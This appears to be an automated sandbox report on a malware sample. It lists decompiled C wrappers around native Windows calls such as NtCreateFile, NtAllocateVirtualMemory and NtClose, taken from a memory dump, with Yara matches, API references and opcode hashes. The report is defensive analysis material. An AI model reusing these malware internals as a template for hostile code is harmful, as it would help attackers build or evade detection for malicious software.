                                                    			E004181AA(HANDLE* _a4, long _a8, struct _EXCEPTION_RECORD _a12, struct _ERESOURCE_LITE _a16, struct _GUID _a20, long _a24, long _a28, long _a32, long _a36, void* _a40, long _a44) {
				intOrPtr _v0;
				long _t21;
				void* _t32;

				_push(0x15f8f4f4);
				_t15 = _v0;
				_t3 = _t15 + 0xc40; // 0xc40
				E00418DB0(_t32, _v0, _t3,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44); // executed
				return _t21;
			}






                                                    0x004181aa
                                                    0x004181b3
                                                    0x004181bf
                                                    0x004181c7
                                                    0x004181fd
                                                    0x00418201

                                                    APIs
                                                    • NtCreateFile.NTDLL(00000060,00408AE3,?,00413B87,00408AE3,FFFFFFFF,?,?,FFFFFFFF,00408AE3,00413B87,?,00408AE3,00000060,00000000,00000000), ref: 004181FD
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.848751535.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 1ed949de7f34d68d55ab0c21cfe9fa293e65e884b90b0c28c59d10e9f88439e9
                                                    • Instruction ID: 2a0df61ff3a4e85755b3cddd2ee9ec8188931669fed560285cbe1c9fe0875c4b
                                                    • Opcode Fuzzy Hash: 1ed949de7f34d68d55ab0c21cfe9fa293e65e884b90b0c28c59d10e9f88439e9
                                                    • Instruction Fuzzy Hash: 0201B6B2201108AFCB48CF88DC85DEB77A9AF8C754F158248FA1D97241CA30E851CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004181B0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E004181B0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E00418DB0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                    0x004181bf
                                                    0x004181c7
                                                    0x004181fd
                                                    0x00418201

                                                    APIs
                                                    • NtCreateFile.NTDLL(00000060,00408AE3,?,00413B87,00408AE3,FFFFFFFF,?,?,FFFFFFFF,00408AE3,00413B87,?,00408AE3,00000060,00000000,00000000), ref: 004181FD
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.848751535.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                    • Instruction ID: 1505d2c2fac7169f29cf6ab97caa2a59105c471fc85729d0552dd22f4c6ed161
                                                    • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                    • Instruction Fuzzy Hash: D7F0B6B2200208ABCB48CF89DC85DEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041838A, Relevance: 1.5, APIs: 1, Instructions: 31memorynativeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 79%
                                                    			E0041838A(void* __eax, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t16;
				void* _t23;

				asm("rcl dword [ebp-0x75], 1");
				_t12 = _a4;
				_t3 = _t12 + 0xc60; // 0xca0
				E00418DB0(_t23, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t16 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t16;
			}





                                                    0x0041838f
                                                    0x00418393
                                                    0x0041839f
                                                    0x004183a7
                                                    0x004183c9
                                                    0x004183cd

                                                    APIs
                                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F84,?,00000000,?,00003000,00000040,00000000,00000000,00408AE3), ref: 004183C9
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.848751535.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateMemoryVirtual
                                                    • String ID:
                                                    • API String ID: 2167126740-0
                                                    • Opcode ID: fb9a98920a22a2a66ae37e26b5b82bc56b7841fff8743d8b9c8f2ad1380ef890
                                                    • Instruction ID: 595520641f9f85669a2a08369ef0a1fbac976693881ca9e5ef54144e3f5f0cfb
                                                    • Opcode Fuzzy Hash: fb9a98920a22a2a66ae37e26b5b82bc56b7841fff8743d8b9c8f2ad1380ef890
                                                    • Instruction Fuzzy Hash: 86F01CB2200208BFCB14DF99DC81EEB77A9EF88354F15854DFE09A7281C635E811CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00418390, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00418390(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E00418DB0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                    0x0041839f
                                                    0x004183a7
                                                    0x004183c9
                                                    0x004183cd

                                                    APIs
                                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F84,?,00000000,?,00003000,00000040,00000000,00000000,00408AE3), ref: 004183C9
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.848751535.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateMemoryVirtual
                                                    • String ID:
                                                    • API String ID: 2167126740-0
                                                    • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                    • Instruction ID: c1f36b05bbd4b7963809c3793a6f2df241a2ee7dc34c60eca979b2d1d68cf477
                                                    • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                    • Instruction Fuzzy Hash: 1DF015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241CA30F810CBE4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004182DC, Relevance: 1.5, APIs: 1, Instructions: 22nativeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 84%
                                                    			E004182DC(void* __eax, void* __edx, void* _a4) {
				intOrPtr _v0;
				intOrPtr _v117;
				long _t13;
				void* _t17;

				_push(ss);
				_v117 = _v117 - __edx;
				_t10 = _v0;
				_t5 = _t10 + 0x10; // 0x300
				_t6 = _t10 + 0xc50; // 0x409733
				E00418DB0(_t17, _v0, _t6,  *_t5, 0, 0x2c);
				_t13 = NtClose(_a4); // executed
				return _t13;
			}







                                                    0x004182de
                                                    0x004182df
                                                    0x004182e3
                                                    0x004182e6
                                                    0x004182ef
                                                    0x004182f7
                                                    0x00418305
                                                    0x00418309

                                                    APIs
                                                    • NtClose.NTDLL(00413D20,?,?,00413D20,00408AE3,FFFFFFFF), ref: 00418305
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.848751535.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID:
                                                    • API String ID: 3535843008-0
                                                    • Opcode ID: abc43d3dc0c737cdec71e27750531ac4c3bbc2f8b360929794a9d83780da5980
                                                    • Instruction ID: a1703c96cc46c7ee26d6f1a113beae69391b1bb59f785d591e186b14771c722a
                                                    • Opcode Fuzzy Hash: abc43d3dc0c737cdec71e27750531ac4c3bbc2f8b360929794a9d83780da5980
                                                    • Instruction Fuzzy Hash: 7DE08C35640214BBDB10DFA5CC45EEB7B68EF85390F15406EBA089B282C630E5008B90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004182E0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E004182E0(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409733
				E00418DB0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                                    0x004182e3
                                                    0x004182e6
                                                    0x004182ef
                                                    0x004182f7
                                                    0x00418305
                                                    0x00418309

                                                    APIs
                                                    • NtClose.NTDLL(00413D20,?,?,00413D20,00408AE3,FFFFFFFF), ref: 00418305
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.848751535.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID:
                                                    • API String ID: 3535843008-0
                                                    • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                    • Instruction ID: 2c2b34aedc846ab3ae484734a1171ee081eb0df99b6426d3cac892bcac86a451
                                                    • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                    • Instruction Fuzzy Hash: 7CD012752003146BD710EF99DC45ED7775CEF44750F154459BA185B242C930F90086E4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01259910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: ac0a9912043ab4b4bd671df90042dc3980686be913c7d4fce7ef18d656050d0f
                                                    • Instruction ID: 9d2a6fe1f813cf39e80b23843b665b2076e985d6616fb62aebc960c2fa3c87f4
                                                    • Opcode Fuzzy Hash: ac0a9912043ab4b4bd671df90042dc3980686be913c7d4fce7ef18d656050d0f
                                                    • Instruction Fuzzy Hash: E89002B131100C02D14071AA44047460009A7D0341F51C011A5454558ECA998DD577E5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 012599A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 60f54caff03131c9a061b7a1f741bdd4c2ffdd87772996e9eb2d1061b4920f73
                                                    • Instruction ID: 4d478d1fd965ffa0ae6112140ff21e0f645a7303f54218040cea177c703f124c
                                                    • Opcode Fuzzy Hash: 60f54caff03131c9a061b7a1f741bdd4c2ffdd87772996e9eb2d1061b4920f73
                                                    • Instruction Fuzzy Hash: D19002A135100C42D10061AA4414B060009E7E1341F51C015E1454558DCA59CC9272A6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01259860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 140748a54c324b0dc5ebc3a0c14673a137463963121a805520d4c079431020f6
                                                    • Instruction ID: d06cac542411b0740a3a756914b192877ee6f6936271ebc8426b878278bbf7b9
                                                    • Opcode Fuzzy Hash: 140748a54c324b0dc5ebc3a0c14673a137463963121a805520d4c079431020f6
                                                    • Instruction Fuzzy Hash: 2690027131100C13D11161AA4504707000DA7D0281F91C412A081455CDDA968992B2A1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01259840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 5b023439958d7dac1f0580b95c8f7967dd584f5764f8eb16e00d87546c7c5651
                                                    • Instruction ID: b82b9931bff359e3b94d8e11c309a27e3b0953c4449a8662a8523441b14b36ae
                                                    • Opcode Fuzzy Hash: 5b023439958d7dac1f0580b95c8f7967dd584f5764f8eb16e00d87546c7c5651
                                                    • Instruction Fuzzy Hash: 2990026135204D525545B1AA4404507400AB7E0281791C012A1804954CC9669896E7A1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 012598F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: fad58ddfeb5cb625f27aa95082cbc7c3ceef134f6e0ba0f82990dc654e15df49
                                                    • Instruction ID: 1ba68b632d03d43bc4175a2076e01ff025726d51b3a3c3ad70b68e715ea12f97
                                                    • Opcode Fuzzy Hash: fad58ddfeb5cb625f27aa95082cbc7c3ceef134f6e0ba0f82990dc654e15df49
                                                    • Instruction Fuzzy Hash: A090026171100D02D10171AA4404616000EA7D0281F91C022A1414559ECE6589D2B2B1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01259A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: e92119a5925b84a123f029e9c61daaa397765535f6068645bf9828d3b335f7ef
                                                    • Instruction ID: 9dcea98d7c6c657fd222f238f9f57cdc55fa599154dbd07b9a18dbf8cd40f587
                                                    • Opcode Fuzzy Hash: e92119a5925b84a123f029e9c61daaa397765535f6068645bf9828d3b335f7ef
                                                    • Instruction Fuzzy Hash: 6990026171100C42414071BA88449064009BBE1251751C121A0D88554DC99988A567E5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01259A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: ad7dbd6bc430002d11f26ea923d95fd6ec355966a67879538c03956640086f2a
                                                    • Instruction ID: 77624be6188c3230e77abee52917440f3ab62214d2cc9fe9d64a259afb5a91fe
                                                    • Opcode Fuzzy Hash: ad7dbd6bc430002d11f26ea923d95fd6ec355966a67879538c03956640086f2a
                                                    • Instruction Fuzzy Hash: 0990027131140C02D10061AA481470B0009A7D0342F51C011A1554559DCA65889176F1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01259A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: cf8bfc4f5db9aca134e7dc14d0bd0d9df56caa6519d21d4bbdbcb825fb4d4bac
                                                    • Instruction ID: 48046ea64390e4d742e25df085da32a760c4549ebd45c08c9b5f7d836e4c02a1
                                                    • Opcode Fuzzy Hash: cf8bfc4f5db9aca134e7dc14d0bd0d9df56caa6519d21d4bbdbcb825fb4d4bac
                                                    • Instruction Fuzzy Hash: FC90026132180C42D20065BA4C14B070009A7D0343F51C115A0544558CCD5588A166A1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01259540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: c2e9ce06c8563d27c25385995ba648b56f1598090c1da52ea04da3c2227b0334
                                                    • Instruction ID: 5b68d0dcb35bbd190d480f9d8f0c24b551ddf6449b5a451d67c11e02a5b6ba0a
                                                    • Opcode Fuzzy Hash: c2e9ce06c8563d27c25385995ba648b56f1598090c1da52ea04da3c2227b0334
                                                    • Instruction Fuzzy Hash: 7790026532100C030105A5AA0704507004AA7D5391351C021F1405554CDA6188A162A1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 012595D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 34fd3e6e239c0957443e1d05fb20c5eb860179ee1976fd1b243c499c57b0d578
                                                    • Instruction ID: 45acc52d2f7bf075d206622b36aa2f7645c267c9e14ec736882e4ff3bbb5a6d4
                                                    • Opcode Fuzzy Hash: 34fd3e6e239c0957443e1d05fb20c5eb860179ee1976fd1b243c499c57b0d578
                                                    • Instruction Fuzzy Hash: 579002A131200C03410571AA4414616400EA7E0241B51C021E1404594DC96588D172A5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01259710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 0b07eebed497c790754b78aae5abc9e498b0d75bf0882e71e461106d484fa14b
                                                    • Instruction ID: efb12e39d496abd0316f291017b043a003821dd5ba18518c06754f621f0976ac
                                                    • Opcode Fuzzy Hash: 0b07eebed497c790754b78aae5abc9e498b0d75bf0882e71e461106d484fa14b
                                                    • Instruction Fuzzy Hash: 3A90027131100C02D10065EA54086460009A7E0341F51D011A5414559ECAA588D172B1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 012597A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 127f11b9f98b8c752f55eacdd6743d4e371887edb5b7762c8beef91ed005570d
                                                    • Instruction ID: 65849803e16b40b131cc3d0e8d5bbc0124f750304efa491a02ab03a30a316607
                                                    • Opcode Fuzzy Hash: 127f11b9f98b8c752f55eacdd6743d4e371887edb5b7762c8beef91ed005570d
                                                    • Instruction Fuzzy Hash: 2190026131100C03D14071AA54186064009F7E1341F51D011E0804558CDD55889663A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01259780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: dba6d9b743c6d7a1989dc8e145fb1441bdc94ccbcd0cfcfb61cfda3950f03492
                                                    • Instruction ID: c61f66bf803ddacdc168569e0f7f66bfff65edbdc23cbe43496657ebb911fe4b
                                                    • Opcode Fuzzy Hash: dba6d9b743c6d7a1989dc8e145fb1441bdc94ccbcd0cfcfb61cfda3950f03492
                                                    • Instruction Fuzzy Hash: 0690026932300C02D18071AA540860A0009A7D1242F91D415A040555CCCD5588A963A1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01259FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 1bedd32b463ac49fa55d6ffa8dbc83dd9147e0e6fde9f50a86ff853f02bd2a1d
                                                    • Instruction ID: 2dd938bd97801373b36badc6989286b29ba73a57b0fb26be6913736a93a7822c
                                                    • Opcode Fuzzy Hash: 1bedd32b463ac49fa55d6ffa8dbc83dd9147e0e6fde9f50a86ff853f02bd2a1d
                                                    • Instruction Fuzzy Hash: DC90027132114C02D11061AA84047060009A7D1241F51C411A0C1455CDCAD588D172A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01259660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 77bfcfc5d8e1278e945608ce411de9acc403dee318f2a7fad8cdcdf17c3a9584
                                                    • Instruction ID: 8dc24a02b625d6d882ba7c41e66bf10bf0c365c07534fa528fc79c04613a7ccb
                                                    • Opcode Fuzzy Hash: 77bfcfc5d8e1278e945608ce411de9acc403dee318f2a7fad8cdcdf17c3a9584
                                                    • Instruction Fuzzy Hash: B090027131100C02D18071AA440464A0009A7D1341F91C015A0415658DCE558A9977E1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 012596E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 5eeeee0baecf3ac3df165dfec829f061c9fb90de8b44569e23588574fbf80431
                                                    • Instruction ID: 943ffddffe842570bba4be51cecbd8c417fb5b8569b3589b6c3b5a93fc0d99ea
                                                    • Opcode Fuzzy Hash: 5eeeee0baecf3ac3df165dfec829f061c9fb90de8b44569e23588574fbf80431
                                                    • Instruction Fuzzy Hash: 3B90027131108C02D11061AA840474A0009A7D0341F55C411A481465CDCAD588D172A1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004088A0, Relevance: .1, Instructions: 92COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.848751535.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
                                                    • Instruction ID: 5568bf364e599ab98db8d6cec98c55b42aa716c8f34da205b899e6f8c2a7a87e
                                                    • Opcode Fuzzy Hash: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
                                                    • Instruction Fuzzy Hash: EF213CB2C4420857CB20E6649D42BFF73BC9B50304F44057FE989A3181F638BB498BA6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00407260, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 55%
                                                    			E00407260(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				signed int _v2091728815;
				void* _t13;
				intOrPtr* _t14;
				int _t15;
				signed char _t18;
				long _t21;
				intOrPtr _t23;
				intOrPtr* _t24;
				void* _t25;
				void* _t29;

				_t29 = __eflags;
				_v68 = 0;
				E00419D10( &_v67, 0, 0x3f);
				_t18 =  &_v68;
				E0041A8F0(_t18, 3);
				_t23 = _a4;
				_v2091728815 = _v2091728815 | _t18;
				asm("invalid");
				_push(_t23); // executed
				_t13 = E00409B10(_t29); // executed
				_t14 = E00413E20(_t23, _t13, 0, 0, 0xc4e7b6d6);
				_t24 = _t14;
				if(_t24 != 0) {
					_t21 = _a8;
					_t15 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					if(_t15 == 0) {
						_t15 =  *_t24(_t21, 0x8003, _t25 + (E00409270(1, 8) & 0x000000ff) - 0x40, _t15);
					}
					return _t15;
				}
				return _t14;
			}















                                                    0x00407260
                                                    0x0040726f
                                                    0x00407273
                                                    0x00407278
                                                    0x0040727e
                                                    0x00407283
                                                    0x00407285
                                                    0x0040728b
                                                    0x0040728d
                                                    0x0040728e
                                                    0x0040729e
                                                    0x004072a3
                                                    0x004072aa
                                                    0x004072ad
                                                    0x004072ba
                                                    0x004072be
                                                    0x004072db
                                                    0x004072db
                                                    0x00000000
                                                    0x004072dd
                                                    0x004072e2

                                                    APIs
                                                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.848751535.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessagePostThread
                                                    • String ID:
                                                    • API String ID: 1836367815-0
                                                    • Opcode ID: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
                                                    • Instruction ID: ed9c0dd32f68776d22a62b6ccf8dda9c2c93357863a303a75fe51d199eec68b3
                                                    • Opcode Fuzzy Hash: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
                                                    • Instruction Fuzzy Hash: DE018431A8032876E720A6959C03FFE776C5B40B55F15416EFF04BA1C2E6A87D0646EA
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00418691, Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.848751535.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    • Opcode ID: 3cbb00fcbea9b7ac8adab75d4a4c8b4a394b41f6ba9d4dbe4390fbc7f5dd7786
                                                    • Instruction ID: 2a3477511c0083f4faa92547bbb46730781a807152f55f976a41dd342d4929f6
                                                    • Opcode Fuzzy Hash: 3cbb00fcbea9b7ac8adab75d4a4c8b4a394b41f6ba9d4dbe4390fbc7f5dd7786
                                                    • Instruction Fuzzy Hash: 1DE09236200214BAC610EB99EC49DE7B769EF84360B0485AAFA4C4B243DA31A55087E5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004184B3, Relevance: 1.5, APIs: 1, Instructions: 25memoryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 82%
                                                    			E004184B3(void* __eax, void* __edi, intOrPtr _a5, void* _a9, long _a13, void* _a17) {
				char _t17;
				void* _t23;

				_t23 = __eax + 1 - 0x1da7699a;
				asm("fistp word [eax+0x7f]");
				_t14 = _a5;
				_t5 = _t14 + 0xc74; // 0xc74
				E00418DB0(_t23, _a5, _t5,  *((intOrPtr*)(_a5 + 0x10)), 0, 0x35);
				_t17 = RtlFreeHeap(_a9, _a13, _a17); // executed
				return _t17;
			}





